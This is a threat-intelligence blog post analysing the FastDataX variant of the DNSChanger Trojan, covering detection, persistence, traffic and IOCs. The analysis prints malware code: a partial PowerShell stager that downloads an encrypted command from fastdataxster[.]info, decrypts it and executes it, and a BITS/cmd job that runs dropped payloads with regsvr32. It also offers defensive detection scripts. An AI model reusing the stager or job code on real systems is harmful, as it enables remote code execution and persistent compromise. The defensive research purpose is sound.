Watch Out: The FastDataX campaign – DNSChanger is Back!

Verint’s Cyber Research team has recently discovered evidence of a new campaign for a variant of the infamous DNSChanger Trojan, which, as its name implies, alters a computer’s DNS entries to point toward rogue name servers. The new Trojan was identified through alerts in a Verint Threat Protection System (TPS) installation, which were triggered by its behavioral C&C detection engine. The alerts triggered an automatic investigation in TPS, which identified other suspicious domains and combined all related alerts into one security incident.

Using forensic tools, Verint’s Cyber Research team determined that this DNSChanger campaign reuses familiar characteristics and patterns, such as PowerShell scripts, BITS jobs and the communication patterns seen in previous campaigns. Further analysis uncovered the initial infection point, related payloads and additional domains, and concluded that they are all part of the new campaign. Interestingly, the campaign makes use of new domains that were registered in March 2017 and had not previously been linked to DNSChanger.

Previous DNSChanger campaigns have been tightly connected with adware and PUAs as a source of (re)infection. The campaign uses a file named “fastdatax.exe”, and initial analysis suggests this may be the DNSChanger component itself. This file creates the BITS tasks, which make the DNSChanger network connections to download and execute payloads (see below).

We named the current campaign “FastDataX” since it revolves around software of that name and communicates with FastDataX[dictionary word].info web sites.

This blog post is a detailed account of the Verint research team’s findings and includes:

  • Initial detection of the malware via behavioral C&C alerts
  • Forensic analysis of infection point
  • Persistence methods
  • Related network traffic analysis
  • List of IOCs


The Verint Threat Protection System (TPS) issued several behavioral C&C alerts pertaining to several fastdatax*.info domains and started an automatic investigation:

Verint Threat Protection System – C&C (Behavioral Analysis) Alert

Verint Threat Protection System – Link Analysis



Forensic analysis of the alerted endpoint revealed the following scenario: a user voluntarily downloaded a malicious file from a file-sharing website. After the user double-clicked the file, an .xht file (XHTML, an HTML document defined as an XML application) was dropped and executed.

The .xht file included a link to


The file also displayed several images, hosted by , that give instructions on how to save and execute the downloaded software:

Instructions on how to save and execute the downloaded software:


The execution of the file also triggered a chain of events which led to the installation of several software bundles that can be categorized as PUP/Adware. Among those were YeaDesktop, PCCleanPlus, X-Madbench and FastDataX. Of these, FastDataX looked the most curious and insidious.

As with previous campaigns (which abused applications like Optimizer Pro and System Healer), this adware serves as the second stage of infection for DNSChanger.


Several persistence mechanisms were used by the installed PUP/Adware:

  • Registry ‘Run’ key – abused by adware such as YeaDesktop
  • Scheduled tasks named after the application, abused by adware like ‘Pangody’ and X-Madbench. For example, a scheduled task named “X-Madbench” executes rundll32 “C:\Program Files\X-Madbench\X-Madbench.dll”,SceNcISYvR
  • Scheduled tasks with random GUID names that execute DLLs via rundll32. For example, a scheduled task named “E3605470-291B-44EB-8648-745EE356599A”
  • Scheduled tasks with random names that execute PowerShell (see more details below)
  • BITS jobs (see more details below)


FastDataX.exe maintains persistence via a scheduled task named “FastDataX”, and an additional scheduled task is created with a GUID-style name (7D0A0D47-057F-040C-7E11-7E0D7905117D). This task runs the following PowerShell script:

# registry update - position windows out of bounds of the screen
function RegistryUpdate($p){
    New-Item -Path $p | Out-Null;
    New-ItemProperty -Path $p -Name $n -PropertyType DWORD -Value 201329664 |
    Set-ItemProperty -Path $p -Name $n -Value 201329664 | Out-Null;
# this is the URL with the GET params
$surl="http[://]fastdataxster[.]info/u/?a=2tpeW5PNy/** snipped by VERINT to protect customer privacy */";
# end of url with params
# check the PS version - exit if it is 1
if($PSVersionTable.PSVersion.Major -lt 2){
# checks whether the Windows version is earlier than 8; exit if it is
if($v.Major -eq 5){
if(($v.Minor -lt 2) -AND ((Get-WmiObject Win32_OperatingSystem).ServicePackMajorVersion -lt 2)){
# checking for a privileged user - if not administrator, exit
if(-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){
# GET request: download further instructions using a "legit" UA (not really)
function downloadCmd($url){
    $rq=New-Object System.Net.WebClient;
    $rq.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)");
    return [System.Text.Encoding]::ASCII.GetString($rq.DownloadData($url));
# Decryption scheme (second byte in the stream is used as XOR key + offset, then AND 0xFF)
function decryptCmd($rawdata){
    $key=$bt[1] -bxor 170;
    $i -lt $bt.Length;
    $bt[$i]=($bt[$i] -bxor (($key + $i) -band 255));
    return(New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream(
        (New-Object IO.MemoryStream($bt, 2, ($bt.Length-$ext))), [IO.Compression.CompressionMode]
Invoke-Expression -command "$sc";
exit 0;

This PS script combines an outgoing GET request to fastdataxster[.]info with decryption of the response body. The decrypted response holds execution data and can thus expand the malware’s abilities at will.

The structure of this PowerShell is similar to a previously analyzed DNSChanger PS script. It should be noted that the domain embedded inside the script is new and was not previously linked to the DNSChanger campaign.

BITS job:

FastDataX also uses BITS (Background Intelligent Transfer Service) jobs, which generate HTTP HEAD requests to fastdataxcast[.]info and fastdataxfire[.]info. We could not find online information regarding these domains or any association between them and the current malware campaign.

That being said, the two types of BITS job are identical to previously analyzed BITS jobs.

The following BITS job is an example of a task recovered from the BITS logs of the infected endpoint; it is used to download, install and clean up the malware payloads.

BITS job to create batch

"cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\4806190a-7c75-1\x.bat" &
echo bitsadmin /complete 4806190a-7c75-1 ^> nul >> "C:\ProgramData\4806190a-7c75-1\x.bat" &
echo bitsadmin /cancel 4806190a-7c75-1 ^> nul >> "C:\ProgramData\4806190a-7c75-1\x.bat" &
echo if exist "C:\ProgramData\4806190a-7c75-1\4806190a-7c75-1.d" goto q >> "C:\ProgramData\4806190a-7c75-1\x.bat" &
for /f %i in ('dir /a:-d /b /w "C:\ProgramData\4806190a-7c75-1\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=477863894806190a" "C:\ProgramData\4806190a-7c75-1\%i" >> "C:\ProgramData\4806190a-7c75-1\x.bat")) > nul &
echo :q >> "C:\ProgramData\4806190a-7c75-1\x.bat" &
echo start /b /min regsvr32.exe /s /n /i:"!=477863894806190a" "C:\ProgramData\4806190a-7c75-1\4806190a-7c75-1.d" >> "C:\ProgramData\4806190a-7c75-1\x.bat" &
echo del "C:\ProgramData\4806190a-7c75-1\x.bat" ^& exit >> "C:\ProgramData\4806190a-7c75-1\x.bat" &
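The persistence and BITS-job patterns above (GUID-named scheduled tasks running rundll32 or PowerShell, and bitsadmin clean-up chained with regsvr32 /s /n /i: on a ProgramData folder) can be turned into simple detection logic. The following is an added example, not Verint's code; the telemetry records are constructed and the field names are assumed:

```python
import re

# Constructed sample telemetry (not from the Verint report): scheduled-task
# registrations and process-creation events from an endpoint.
SAMPLE_EVENTS = [
    {"type": "task", "name": "X-Madbench",
     "action": r'rundll32 "C:\Program Files\X-Madbench\X-Madbench.dll",SceNcISYvR'},
    {"type": "task", "name": "E3605470-291B-44EB-8648-745EE356599A",
     "action": r'rundll32.exe "C:\ProgramData\xyz\payload.dll",Run'},
    {"type": "task", "name": "7D0A0D47-057F-040C-7E11-7E0D7905117D",
     "action": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand AAAA"},
    {"type": "task", "name": "Adobe Acrobat Update Task",
     "action": r'"C:\Program Files\Adobe\AdobeUpdate.exe"'},
    {"type": "process", "name": "cmd.exe",
     "action": r'cmd /c "(echo bitsadmin /cancel 4806190a-7c75-1 ^> nul >> "C:\ProgramData\4806190a-7c75-1\x.bat" & '
               r'echo start /b /min regsvr32.exe /s /n /i:"!=477863894806190a" "C:\ProgramData\4806190a-7c75-1\a.tmp" >> '
               r'"C:\ProgramData\4806190a-7c75-1\x.bat")"'},
    {"type": "process", "name": "regsvr32.exe",
     "action": r'regsvr32.exe /s "C:\Windows\System32\msxml3.dll"'},
]

GUID_RE = re.compile(r"^[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$", re.I)
LOLBIN_RE = re.compile(r"\b(rundll32|powershell|regsvr32|bitsadmin)(\.exe)?\b", re.I)
# regsvr32 with /n (skip DllRegisterServer) and /i (call DllInstall): the form
# the recovered BITS job writes into x.bat for each dropped .tmp file
REGSVR32_INSTALL_RE = re.compile(r"regsvr32(\.exe)?\s+/s\s+/n\s+/i:", re.I)
PROGRAMDATA_RE = re.compile(r"C:\\ProgramData\\", re.I)
BITSADMIN_RE = re.compile(r"bitsadmin\s+/(complete|cancel)\b", re.I)

def classify_event(event):
    """Return finding tags for one record; an empty list means nothing fired."""
    findings = []
    name, action = event["name"], event["action"]
    if event["type"] == "task":
        if GUID_RE.match(name) and LOLBIN_RE.search(action):
            findings.append("guid_named_task_runs_lolbin")
        if re.search(r"rundll32", action, re.I) and re.search(r'\.dll",\w+', action):
            findings.append("task_rundll32_dll_export")
    if REGSVR32_INSTALL_RE.search(action) and PROGRAMDATA_RE.search(action):
        findings.append("regsvr32_dllinstall_from_programdata")
    if BITSADMIN_RE.search(action) and REGSVR32_INSTALL_RE.search(action):
        findings.append("bits_cleanup_chained_with_regsvr32")
    return findings

def scan(events):
    """Map the index of each record that fired to its list of findings."""
    results = {}
    for i, event in enumerate(events):
        findings = classify_event(event)
        if findings:
            results[i] = findings
    return results
```

The rundll32-with-export rule will also match some legitimate vendor tasks, so treat it as a triage hint and the GUID and regsvr32/bitsadmin rules as the stronger signals.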

Changes to the DNS settings

DNSChanger has used one of three methods to change the DNS settings:

  • Modifying the ‘NameServer’ and ‘DHCPNameServer’ values in the Windows registry, thus replacing the configured servers with new DNS servers (and calling the DhcpNotifyConfigChange API to apply the change)
  • Changing the router’s DNS configuration (as analysed by Proofpoint)
  • Editing the local HOSTS file

The ‘FastDataX’ variant of DNSChanger uses the third method. It adds multiple domains (see the list in the IOC section of this article) that are used to download additional payloads.
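A HOSTS-file audit is the natural check for this third method: any name mapped to a routable address rather than a loopback or sinkhole address, and not on the administrator's own expected list, deserves attention, and grouping the flagged names by target IP shows when several domains have been pointed at one host. The following is an added example, not code from the Verint report; the HOSTS contents are constructed:

```python
import ipaddress

# Constructed HOSTS file (not taken from the infected endpoint): the default
# commented loopback lines, one expected lab override, two entries of the kind a
# DNSChanger variant appends to steer downloads, and an ad-blocking sinkhole.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# localhost name resolution is handled within DNS itself.
#\t127.0.0.1       localhost
#\t::1             localhost
192.168.10.5   build.internal.example   # lab host, expected
198.51.100.23  update.example-vendor.test
198.51.100.23  cdn.example-vendor.test   dl.example-vendor.test
0.0.0.0        ads.tracker.test
"""

def parse_hosts(text):
    """Yield (ip, hostname, line_no) for every active mapping in a HOSTS file."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        for name in fields[1:]:                   # one IP may carry several names
            yield fields[0], name.lower(), line_no

def audit_hosts(text, expected_names=()):
    """Flag HOSTS entries that redirect a name to a reachable address.

    Loopback/unspecified targets (the usual ad-blocking sinkholes) are ignored;
    every other mapping is reported unless the name is on the expected list.
    """
    findings = []
    for ip, name, line_no in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append({"line": line_no, "name": name, "ip": ip, "reason": "unparseable_ip"})
            continue
        if addr.is_loopback or addr.is_unspecified or name in expected_names:
            continue
        findings.append({"line": line_no, "name": name, "ip": ip, "reason": "redirect"})
    return findings

def targets_by_ip(findings):
    """Group flagged names by the address they were pointed at."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["ip"], []).append(f["name"])
    return {ip: sorted(names) for ip, names in grouped.items()}
```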


An analysis with Verint’s TPS Network Forensics component, which enables a detailed network analysis, revealed evidence of the malware’s C&C communication:

This enabled the Cyber research team to distinguish between three types of sessions with similar structures:

1. HEAD request sessions to “fastdataxfier[.]info” and “fastdataxcast[.]info”. As discussed above, these are generated by FastDataX BITS jobs:

2. GET request sessions to “fastdataxster[.]info” that were generated by the above mentioned PowerShell script:

3. POST request sessions to “fastdataxient[.]info”, “fastdataxium[.]info” and “fastdataxify[.]info”.

It should be noted that all the FastDataX domains resolved to the same IP address, one that was used in a previous DNSChanger campaign.

As can be seen from the above images, the user agents used by the malware differ from each other and are spoofed. A noticeable example is a “bug” in generating a user agent, where the words “user agent” appear twice:

The traffic structure is similar to that observed in the past and attributed to DNSChanger, where the parameters contained system information and DNS configuration information.

Below is a list of identified IOCs relating to the FastDataX campaign.



Seen on 21-22.06.2017 in Verint TPS

Related domains:

Table: related domains with their passive DNS replication dates (2017-06-08 to 2017-07-07); the domain column was not preserved.

Domains found inside the HOSTS file



MD5 SHA256 Description
fdfebd2ba002b18eac079a1ac21ef70d 16ea0a1c090e8084cbee7d5b9eb55d07d7db09eb58ee93fe096c9b624d9dae64 Payload downloader (.xht)
a11e1be8f9418f4e075b4c9794bc75f8 a779534bd4110602ef630a0afe8031f931d7fa4f7ef84b3e449d915a60d1b0ea Pangody.dll
8c03a0be7aadec4506fc52c4a507e320 f1eda24967aafc09d82418d8e92a189221bdfe52befa7cbbdb6d8642a8ffd5b8 X-Madbench.dll

Author: Verint Research Lab